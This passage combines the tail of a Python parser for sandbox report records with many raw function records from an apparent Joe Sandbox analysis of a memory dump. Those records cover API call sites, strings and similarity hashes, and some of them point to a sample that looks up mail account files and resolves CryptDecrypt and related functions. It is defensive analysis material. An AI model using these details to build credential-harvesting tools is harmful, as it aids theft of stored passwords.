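# One API bullet: "memset.MSVCRT ref: 00410780", "RegCloseKey.ADVAPI32(?,00000104), ref: 004107E9",
# optionally prefixed with "Part of subcall function 0041067E: ".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<func>[^.\s(]+)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Constructed sample: two records copied from this page (Shell Folders lookup, resource loader).
SAMPLE = r"""
APIs
  • Part of subcall function 0041067E: LoadLibraryA.KERNEL32(shell32.dll,0041073A,00000104), ref: 0041068C
  • Part of subcall function 0041067E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004106A1
• memset.MSVCRT ref: 00410780
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 004107E9
Strings
• Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0041079B, 004107AB
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
• String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
• API String ID: 889583718-2036018995
• Instruction Fuzzy Hash: 2811D071C00218FBEB24F6948C85EEF77AC9B15304F1400B7F95161192E6B99ED4CA99
Uniqueness Score: -1.00%

APIs
• FindResourceA.KERNEL32(?,?,?), ref: 004105EA
• SizeofResource.KERNEL32(?,00000000), ref: 004105FB
• LoadResource.KERNEL32(?,00000000), ref: 0041060B
• LockResource.KERNEL32(00000000), ref: 00410616
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
• Instruction Fuzzy Hash: 88019636600315AB8F155F65DC4599F7FAAFFD63917088036F909CA361D7B1C891C68C
Uniqueness Score: -1.00%
"""


def _new():
    return {"apis": [], "strings": [], "source": {}, "snapshot": None,
            "similarity": {}, "uniqueness_score": None}


def parse_records(text):
    """Return one dict per function record; a record ends at its 'Uniqueness Score' line."""
    records, rec, section = [], _new(), None
    for raw in text.splitlines():
        line = raw.strip()  # the page's deep indentation is irrelevant
        if not line:
            continue
        if line.startswith("Uniqueness Score:"):
            rec["uniqueness_score"] = float(line.split(":", 1)[1].strip().rstrip("%"))
            records.append(rec)
            rec, section = _new(), None
        elif line in SECTIONS:
            section = line
        elif line.startswith("•"):
            _add_bullet(rec, section, line[1:].strip())
        # anything else (control-flow-graph dumps, legends, other headers) is ignored
    return records


def _add_bullet(rec, section, item):
    if section == "APIs" and (m := API_RE.match(item)):
        rec["apis"].append({"func": m["func"], "module": m["mod"],
                            "args": m["args"].split(",") if m["args"] else [],
                            "ref": m["ref"].upper(),
                            "subcall": m["sub"].upper() if m["sub"] else None})
    elif section == "Strings":
        value, sep, xrefs = item.rpartition(", xrefs: ")
        if not sep:
            value, xrefs = item, ""
        rec["strings"].append({"value": value,
                               "xrefs": [x.strip().upper() for x in xrefs.split(",") if x.strip()]})
    elif section == "Memory Dump Source":
        rec["source"] = dict(p.split(": ", 1) for p in item.split(", "))
    elif section == "Joe Sandbox IDA Plugin" and item.startswith("Snapshot File:"):
        rec["snapshot"] = item.split(":", 1)[1].strip()
    elif section == "Similarity":
        key, _, value = item.partition(":")
        rec["similarity"][key.strip()] = value.strip()


def api_index(records):
    """Map 'MODULE!func' to sorted call sites across all records (subcall entries included)."""
    index = {}
    for rec in records:
        for api in rec["apis"]:
            index.setdefault(f"{api['module']}!{api['func']}", set()).add(api["ref"])
    return {k: sorted(v) for k, v in index.items()}


def similarity_pivots(records):
    """(API String ID, Instruction Fuzzy Hash) per record: the fields to search other reports for."""
    return [(r["similarity"].get("API String ID"), r["similarity"].get("Instruction Fuzzy Hash"))
            for r in records if r["similarity"]]
```

Feed it the whole functions section of a report and api_index gives every call site per imported API (useful for setting breakpoints on RegCloseKey or LockResource in the dumped module at base 00400000), while similarity_pivots gives the pairs to grep for in other reports. Two reading aids for the records that follow: API IDs such as ??2@ and ??3@ are the MSVC-decorated names of operator new and operator delete, so those records are plain C++ allocation, and the Shell Folders / SHGetSpecialFolderPathA pair above is the usual way of resolving per-user profile directories (with the GetVersionExA subcall choosing between the registry and the shell32 export).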
APIs
• FindResourceA.KERNEL32(?,?,?), ref: 004105EA
• SizeofResource.KERNEL32(?,00000000), ref: 004105FB
• LoadResource.KERNEL32(?,00000000), ref: 0041060B
• LockResource.KERNEL32(00000000), ref: 00410616
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
• Opcode ID: aa79f82f4ecfd8f7b628c1d7de4cc48f572b3be46360eaed4676304fbba1ef3c
• Instruction ID: 4a68303d5b5253afd20c9a06ef53f1b3f3171458fb19c91adc6236e38678b247
• Opcode Fuzzy Hash: aa79f82f4ecfd8f7b628c1d7de4cc48f572b3be46360eaed4676304fbba1ef3c
• Instruction Fuzzy Hash: 88019636600315AB8F155F65DC4599F7FAAFFD63917088036F909CA361D7B1C891C68C
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0041036C
  • Part of subcall function 0040735C: sprintf.MSVCRT ref: 00407394
  • Part of subcall function 0040735C: memcpy.MSVCRT ref: 004073A7
• WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410390
• memset.MSVCRT ref: 004103A7
• GetPrivateProfileStringA.KERNEL32(?,?,0044551F,?,00002000,?), ref: 004103C5
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: PrivateProfileStringmemset$Writememcpysprintf
• String ID:
• API String ID: 3143880245-0
• Opcode ID: 300669213aa10e30692949e2fcfbaed099003638c554249b47492bf17e1db58e
• Instruction ID: 9d0f41c8c3888dc292d70de46467aaf9ffb36b28435196f73ffda5293cd27e0f
• Opcode Fuzzy Hash: 300669213aa10e30692949e2fcfbaed099003638c554249b47492bf17e1db58e
• Instruction Fuzzy Hash: B501847280431DBFEF116F60EC89EDB7B79EF04314F1000A6FA08A2052D6759D64DB69
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: ??2@
• String ID:
• API String ID: 1033339047-0
• Opcode ID: c9d9b14cbc3cffdefcd651bca10b6be545bbad424ff6817e9a729584ede19952
• Instruction ID: 91b6e48186620c166d1d4af44a265f78501a0d7a4e3c1a8b362a1fb29a74aa2a
• Opcode Fuzzy Hash: c9d9b14cbc3cffdefcd651bca10b6be545bbad424ff6817e9a729584ede19952
• Instruction Fuzzy Hash: 17F0F9B5901300AFE7549B3CED0672676E4E75C356F04983FA30A8A2F2EB79C8448B08
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: ??3@mallocmemcpy
• String ID:
• API String ID: 3831604043-0
• Opcode ID: 6dc2a86f1fe2ee347426ab0121a461cac49b5a84b0ae56981e7af52698dffbe8
• Instruction ID: 120c5a36fa875b11696935209168df4f9df621bec9a22d80de65970bbd8b26ad
• Opcode Fuzzy Hash: 6dc2a86f1fe2ee347426ab0121a461cac49b5a84b0ae56981e7af52698dffbe8
• Instruction Fuzzy Hash: 13F0E9727053225FD708EB75B94184B73DDAF84324712482FF505E7282D7389C60CB59
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00406D65: memset.MSVCRT ref: 00406D6F
  • Part of subcall function 00406D65: _mbscpy.MSVCRT ref: 00406DAF
• CreateFontIndirectA.GDI32(?), ref: 00406E44
Strings
Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: CreateFontIndirect_mbscpymemset
• String ID: Arial
• API String ID: 3853255127-493054409
• Opcode ID: af81b5a79715ac1c537919aec0876ca352f4b846121989fe158db9d7d4b71e29
• Instruction ID: b68263c9f29210b4531b01fb65f498acbd183b68a5d206dac463ad1e531dcf8e
• Opcode Fuzzy Hash: af81b5a79715ac1c537919aec0876ca352f4b846121989fe158db9d7d4b71e29
• Instruction Fuzzy Hash: FFD0C974E4020C67DA10B7A0FC07F49776C5B01705F510421B901B10E2EAA4A15886D9
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_wab.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
• Instruction ID: ba634a3ae7870b83a4a63a7f1e5f980291c684f9ee159ca978f4bf55c64cb7ac
• Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
• Instruction Fuzzy Hash: 8C21F9521C82826FFB218BB44C017676FD9CBD3364B190A87E040EB243D5AC5856937E
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00401E60: memset.MSVCRT ref: 00401E82
                                                                                                                                                                                                            • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401E9B
                                                                                                                                                                                                            • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EA9
                                                                                                                                                                                                            • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EEF
                                                                                                                                                                                                            • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EFD
                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040CBE4
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: strlen$_strcmpimemset
                                                                                                                                                                                                          • String ID: /stext
                                                                                                                                                                                                          • API String ID: 520177685-3817206916
                                                                                                                                                                                                          • Opcode ID: 1152ae9ba3ffa0329dd0f68586efa17a4cc19575da3326fd738d138d66e7bba5
                                                                                                                                                                                                          • Instruction ID: cdbc65eb55c3596dd52c6b91df7f07afa5e13005eab10b9a6f004d04cd94ae5a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1152ae9ba3ffa0329dd0f68586efa17a4cc19575da3326fd738d138d66e7bba5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE216271618111DFD35CEB39D8C1A66B3A9FF04314B15427FF41AA7282C738EC118B89
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                          • Instruction ID: 64d8077581e7bfcf5b5a7686d9ec621b59dbeaea1ec513f5aad7139115001ce4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C012D015C564139FB20A6F50C02BBB5F8D8AD7364B181B4BF150F7293D99C8D16937E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00444A5C,00444A45), ref: 00444A7E
                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00444A5C,00444A45), ref: 00444A92
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                          • Instruction ID: 9d415219164cce1615491981170e8b778fb578cfb811cd04a9329a68800e1f42
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DCF0C2412C52817DFB2195F50C42BBB4FCC8AE7360B280B47B110EB283D49D8D1693BE
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00404780: FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 145871493-0
                                                                                                                                                                                                          • Opcode ID: 19cbb58c83f46949a6f81fbd15abd7b556fa9c3d80d4a4eb7eee3cb29104cd1a
                                                                                                                                                                                                          • Instruction ID: 2550b76864eeaa7c500838184e9c491a546ed4ce74a868b02878dd57666eb7ef
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19cbb58c83f46949a6f81fbd15abd7b556fa9c3d80d4a4eb7eee3cb29104cd1a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5F01BF4600B029FD760AF35E848B9B77E5AF86710F00453EF665E3182D778A545CB58
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410407
                                                                                                                                                                                                            • Part of subcall function 004102F8: memset.MSVCRT ref: 00410316
                                                                                                                                                                                                            • Part of subcall function 004102F8: _itoa.MSVCRT ref: 0041032D
                                                                                                                                                                                                            • Part of subcall function 004102F8: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0041033C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4165544737-0
                                                                                                                                                                                                          • Opcode ID: 0dc81d5659c27ec3f684feb4a7343de4234ed54be118f3a80d7180ba5ee1fafc
                                                                                                                                                                                                          • Instruction ID: a6fec7de448531cc7e5bdd8bb9ba05dfe42c6da5839e04c605b7484fd2ec2d67
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0dc81d5659c27ec3f684feb4a7343de4234ed54be118f3a80d7180ba5ee1fafc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23E0BD3204060EBFCF125F80EC05AAA7BA6FF04354F24886AFD6804121D77299F0AB99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                          • Opcode ID: 0080a8822f3c614f9ebefc2abddcc045fe481ba4110b5f37c1852287057a9d03
                                                                                                                                                                                                          • Instruction ID: 32a23a6afe1256adb8d295dcdce629e4b632fcbc5e0d618fa027d99050396328
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0080a8822f3c614f9ebefc2abddcc045fe481ba4110b5f37c1852287057a9d03
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7D012714003118FDB609F14FD4CBA173E8AF41312F1504B8E994AB192C3749840CA58
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040ABFF,00000000), ref: 00406ACA
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                          • Opcode ID: 1ce9c131fa00a6cba9e51da9fc4262f8f7b5bc2fb1b2ae73e770c5136e6a3475
                                                                                                                                                                                                          • Instruction ID: 174152b0962da7481451d0c07619c80c3ba7c59bd8607505f6d9dddbb6799519
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ce9c131fa00a6cba9e51da9fc4262f8f7b5bc2fb1b2ae73e770c5136e6a3475
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08C012F06503007FFF204B10AC0AF37369DD780700F1044207E00E40E1C2A14C40C524
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,00403C1D), ref: 00410172
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                          • Opcode ID: 2bb0b70da7ab9a9f1d06c574187436387b11b6424b20dab8934fc130d0c11713
                                                                                                                                                                                                          • Instruction ID: 507e23945262d0460dd2b0da46a8ed0ea94319227dbecdfb5597338915b85de2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2bb0b70da7ab9a9f1d06c574187436387b11b6424b20dab8934fc130d0c11713
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6EC04C35510B019BEB219B22D949753B7E4AB05316F40C81CA59695451D7BCE494CE18
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnumResourceNamesA.KERNEL32(?,?,Function_000105DD,00000000), ref: 00410672
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: EnumNamesResource
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3334572018-0
                                                                                                                                                                                                          • Opcode ID: 11eb8b3ad73b6762afc3db70ccaf6c8089b2cfe60785521265f3d13c2ac885fb
                                                                                                                                                                                                          • Instruction ID: e40f58546d13f5b106010a29914381b046978f91ca1901c00a2019c551bf0e65
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11eb8b3ad73b6762afc3db70ccaf6c8089b2cfe60785521265f3d13c2ac885fb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0C09B31554341A7C701DF108C09F1A7695BB55705F504C297151940A4C7514054DB15
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindClose.KERNELBASE(?,00407C39,?,?,00000000,.8D,0044373A,*.oeaccount,.8D,?,00000104), ref: 00407D29
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseFind
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1863332320-0
                                                                                                                                                                                                          • Opcode ID: fadcbaaacaeb9138fef9dc8452ad8ac79757f966f14a2d9034369e41b7735666
                                                                                                                                                                                                          • Instruction ID: e21386352e8edd65572014a1fcaa83e24a75218a268847cd9e3b74dd15e40f0a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fadcbaaacaeb9138fef9dc8452ad8ac79757f966f14a2d9034369e41b7735666
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50C092349109018FD62C9F38DC5A52A77A0BF5A3343B40F6CA0F3D20F0E778A842CA08
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Open
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 71445658-0
                                                                                                                                                                                                          • Opcode ID: 21d2125e3753e601ca1b20deba59a5865270c48a78257e55b283f3ccc3de6cc0
                                                                                                                                                                                                          • Instruction ID: 9e85f5290c785a84adc9a585aa79e4266a03e2402c05001ad2ac5d5d83fda341
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 21d2125e3753e601ca1b20deba59a5865270c48a78257e55b283f3ccc3de6cc0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40C09B39544301BFDE114F40FD05F09BB61BB84F05F504414B244240B182714414EB57
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                          • Opcode ID: 2ea5a109eb267fb6083926362ae3c8176b926bbef034cd1da8757df3be379db2
                                                                                                                                                                                                          • Instruction ID: 1a596b20ff26773e60743876e99a20c5f0c5c53ebb8dbfb842e64d2fd6ed3a7e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ea5a109eb267fb6083926362ae3c8176b926bbef034cd1da8757df3be379db2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76B012792108005FCF1807349C4904D35506F45631760073CF033C00F0D720CC60BA00
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A6B,?,00404981,?,?,00000000,?,00000000,?), ref: 004047D5
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047E9
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptReleaseContext), ref: 004047F5
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptCreateHash), ref: 00404801
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptGetHashParam), ref: 0040480D
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptHashData), ref: 00404819
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptDestroyHash), ref: 00404825
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptDecrypt), ref: 00404831
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptDeriveKey), ref: 0040483D
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptImportKey), ref: 00404849
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptDestroyKey), ref: 00404855
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                          • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                                          • API String ID: 2238633743-192783356
                                                                                                                                                                                                          • Opcode ID: cdc1f63c0c232f946f357b8b2aefe836e2e50651c8dba3e6496bd37ee8642a43
                                                                                                                                                                                                          • Instruction ID: 96d911507a8a1b00aef88e3b883ab5eac538cf63a3166b36270edd586bbeed94
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cdc1f63c0c232f946f357b8b2aefe836e2e50651c8dba3e6496bd37ee8642a43
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A501C974940744AFDB31AF769C09E06BEF1EFA97003224D2EE2C553650D77AA010DE49
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
